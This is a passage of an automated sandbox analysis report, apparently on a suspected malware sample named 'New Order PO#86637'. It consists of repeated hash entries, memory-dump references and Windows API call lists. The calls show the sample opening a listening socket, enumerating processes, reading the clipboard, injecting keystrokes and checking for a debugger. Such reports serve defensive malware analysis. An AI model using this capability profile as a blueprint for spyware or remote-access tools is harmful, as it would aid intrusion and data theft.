                                                                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                            • GetLastError.KERNEL32 ref: 0045D6BF
                                                                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_strncmp
                                                                            • String ID: @oH$\$^$h
                                                                            • API String ID: 2175499884-3701065813
                                                                            • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                            • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                            • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                            • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                            • String ID:
                                                                            • API String ID: 540024437-0
                                                                            • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                            • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                            • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                            • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                            • API String ID: 0-2872873767
                                                                            • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                            • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                            • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                            • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                            • __wsplitpath.LIBCMT ref: 00475644
                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                            • _wcscat.LIBCMT ref: 00475657
                                                                            • __wcsicoll.LIBCMT ref: 0047567B
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2547909840-0
                                                                            • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                            • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                            • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                            • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                            APIs
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                            • FindClose.KERNEL32(?), ref: 004525FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                            • String ID: *.*$\VH
                                                                            • API String ID: 2786137511-2657498754
                                                                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                            • String ID: pqI
                                                                            • API String ID: 2579439406-2459173057
                                                                            • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                            • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                            • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                            • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                            APIs
                                                                            • __wcsicoll.LIBCMT ref: 00433349
                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                            • __wcsicoll.LIBCMT ref: 00433375
                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicollmouse_event
                                                                            • String ID: DOWN
                                                                            • API String ID: 1033544147-711622031
                                                                            • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                            • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                            • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                            • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                            • String ID:
                                                                            • API String ID: 3031425849-0
                                                                            • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                            • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                            • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                            • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                            APIs
                                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                            APIs
                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                            • IsWindowVisible.USER32 ref: 0047A368
                                                                            • IsWindowEnabled.USER32 ref: 0047A378
                                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                            • IsIconic.USER32 ref: 0047A393
                                                                            • IsZoomed.USER32 ref: 0047A3A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                            • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                            APIs
                                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                            • CoInitialize.OLE32(00000000), ref: 00478442
                                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                            • CoUninitialize.OLE32 ref: 0047863C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 886957087-24824748
                                                                            • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                            • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                            APIs
                                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                            • String ID:
                                                                            • API String ID: 15083398-0
                                                                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: U$\
                                                                            • API String ID: 4104443479-100911408
                                                                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
